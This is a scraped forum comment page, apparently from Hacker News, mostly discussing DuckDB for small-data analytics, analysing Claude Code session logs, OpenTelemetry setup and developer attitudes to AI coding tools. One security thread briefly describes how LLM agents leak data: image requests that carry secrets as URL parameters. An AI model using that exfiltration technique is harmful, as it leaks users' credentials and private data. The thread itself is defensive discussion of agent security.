DuckDB is amazing for any sort of fast data analysis when the data is small enough that it can fit on your laptop
Recently at work I've been using it to analyse the Claude code sessions of every engineer at our company (that we upload to S3) and it's been extremely helpful to help us find gaps in devex and have clear metrics to back up the impact of fixing them
Another thing it's been really useful for has been getting metrics on Claude skills usage and then dive into use-cases by looking at the transcripts
Other engineers that had never touched DuckDB were so impressed with how easy it is for AI agents to write queries on our dataset
>> DuckDB is amazing for any sort of fast data analysis when the data is small enough that it can fit on your laptop
I agree, and the dirty (not so) secret big data providers like Snowflake try to hide: the majority of your work is not big data and WILL fit on your local machine. My last company was spending $2M/yr on contract with Snowflake, and another million between Fivetran and Matillion. Of the 1200 clients using analytics maybe 2 had enough data to warrant "infinite scalability" and a dozen wanted Snowflake because they already had corporate warehouses in Snowflake (they probably didn't need it either). Turns out the Extract and Load could be handled by bog-standard C# code and a bunch of SQL, while almost everyone was better off with a DuckDB database running locally, often in the browser. You've probably heard YAGNI before (You Ain't Gonna Need It) but it's even more likely with "Big Data". #SmallDataConvert
Folks have been beating this drum for as long as I've worked in software, dating to the Hadoop era, and it remains true today. So much of "big data" only appears big because it's poorly stored, or is represented wastefully (in persistent storage or in memory).
A good portion of users querying Snowflake at large companies are not technical so you can’t expect them to run DuckDB, not to mention data access controls
Greybeam (the company writing the blog) offers a service to proxy Snowflake and route queries in the fly to DuckDB or Snowflake based on predicted size. Saves a lot of money.
Like sqlite, duckdb is underappreciated as a production database. You can totally run it on servers or even "serverless" and do some heavy data transformations or with the right server size work with large scale datasets (up to a TB compressed seems fine).
This. I've recently used both duckdb and sqlite to power a dashboard for a small restaurant of a family member. It converts all their sales to a very tiny parquet files, daily.
The file fits in memory and can do all sort of computation in the browser itself. The backend is extremely simple, it just loads the JS and serves the parquet files.
It was also trivial to let the owner do their own queries, just give the schema to an LLM and let it use the charting library, no data hallucinations. If they need it in the dashboard they can either use that one or ask me to review that query.
To be honest, given how simple some things became, it's been really fun to work on.
Similar experience here. The best thing I've built in a long time is replacing a complex (and scary) permissions system built on top of Snowflake with single role duckdb databases that - aside from no longer worrying about bugs leaking data across roles - are more performant, timely and flexible. Combined with the use of AI this is the way forward IMO.
At the other end of the spectrum, working with random data on "what if?" and exploration tasks with DuckDB is fun again. it's so straightforward and fast, with tools and functions for pretty much everything.
I have a a theory that LLMs are going to be the death knell of big SaaS. It's so much harder to build and maintain an massive SaaS that does 80% of what 80% of your customers want, than it is to build something small and simple that does 100% of what one customer wants.
Not to mention it can query across heterogeneous sources, so the same query can use a duckdb table, sqlite, csv, and parquet (including predicate pushdown).
>Recently at work I've been using it to analyse the Claude code sessions of every engineer at our company (that we upload to S3) and it's been extremely helpful to help us find gaps in devex and have clear metrics to back up the impact of fixing them
Nice! How do you set things up so that your engineers's claude code sessions upload to S3? Thanks for the help in advance
Probably on a business / Enterprise plan, which has managed settings and also telemetry export. Give it a collector endpoint to export to and then have collector send to s3.
If you use OpenCode, the sessions are all in a local sqlite database. After lunch I'm pushing one of my agents to crunch some data from that using duckdb...
Agree, in addition to that DuckDB also works quite well for data that is too big to fit in memory or on the machine DuckDB is on (predicate push down, out of core processing, …).
Not who you responded to, but I've been working on cctx. It's an open source tool for analyzing claude code sessions to see where things went wrong(tool failure loops, bloated context, and the like).
Congrats on the launch, this looks very promising. I hadn't seen any installation that uses a URL to point to a skill, seems like an evolution of wizard scripts
That been said for more complex setups like on kubernetes where you need a collector and an operator I found OTEL to be super painful to setup a couple of years ago. Has it gotten any easier now?
I'm afraid a collector and the operator are still the recommended way to go by OpenTelemetry (https://opentelemetry.io/docs/platforms/kubernetes/getting-s...). We're still working on a custom skill for Kubernetes, but the general skill should give you a sane default already.
A good way to start can be to start sending traces/logs directly by instrumenting the service and putting our backend as the collector.
I also help out personally whenever our clients have any questions on setting up the telemetry :)
Great article as usual, got a flashback to reading your first post on here 8 years ago. At the time I was starting my career in tech by building small projects for fun and launching them on Product Hunt. Great to see you’re still going at it!
To be fair I remember spending almost two weeks implementing OTel at my startup, the infrastructure as code setup of getting collectors running within a kubernetes cluster using terraform was a nightmare two years ago.
I just kept running into issues, the docs were really poor and the configuration had endless options
some of the design interactions are really polished. the section written with the quotes from founders is really cool. the hover effect with the before and after of the YC partners is a great touch too!
to be fair at least half of the software engineers i know are facing some level of existential crisis when seeing how well claude code works, and what it means for their job in the long term
and these are people are not junior developers working on trivial apps
Yeah, I've watched a few peers go down this spiral as well. I'm not sure why, because my experience is that Claude Code and friends are building a lifetime of job security for staff-level folks, unscrewing every org that decided to over-delegate to the machine
Cleanup is less enjoyable than product building. If every future job is cleaning up a massive pile of AI slop, then that is a less fulfilling world than currently.
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.
As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
> Employees are under contract and are screened for basic competence. LLMs aren't
So perhaps they should be.
> and can't be.
Ah but they must, because there's not much else you can do.
You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.
Unless both the legalities and technology radically change they will not be. And the companies building them will not take on the burden since the technology has proved to be so unpredictable (partially by design) and unsafe.
> designed to be more like little people on a chip - and need to be treated accordingly
Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.
I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.
> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.
Very true when comparing to acquaintances, but at a scale of any company or system except the tiniest ones, you can't blindly trust people in general either. Building systems involving people and LLMs is pretty similar.
> I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.
That is, indeed, the key. My point is that, unlike the popular opinion in threads like this, it does not follow that we need to give up on LLMs, or that we need to fix the security issues. The former is undesirable, the latter is fundamentally impossible.
What we need is what we've been doing ever since civilization took shape, ever since we've started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.
What people still get wrong is treating LLMs as "automatons" components. They're not, they're "people" components.
I think I generally agree, but I also think that treating them like people means that you expect reason, intelligence and a way to interrogate their way of "thinking" (very broad quotes here).
I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. They have separate concerns and fitness for a use-case than both existing categories.
Sooo the primary way we enforce contracts and laws against people are things like fines and jail time.
How would you apply the threat of those to "little people on a chip", exactly?
Imagine if any time you hired someone there was a risk that they'd try to steal everything they could from your company and then disappear forever with you having no way to hold them to account? You'd probably stop hiring people you didn't already deeply trust!
Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there's a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).
Recently at work I've been using it to analyse the Claude code sessions of every engineer at our company (that we upload to S3) and it's been extremely helpful to help us find gaps in devex and have clear metrics to back up the impact of fixing them
Another thing it's been really useful for has been getting metrics on Claude skills usage and then dive into use-cases by looking at the transcripts
Other engineers that had never touched DuckDB were so impressed with how easy it is for AI agents to write queries on our dataset
reply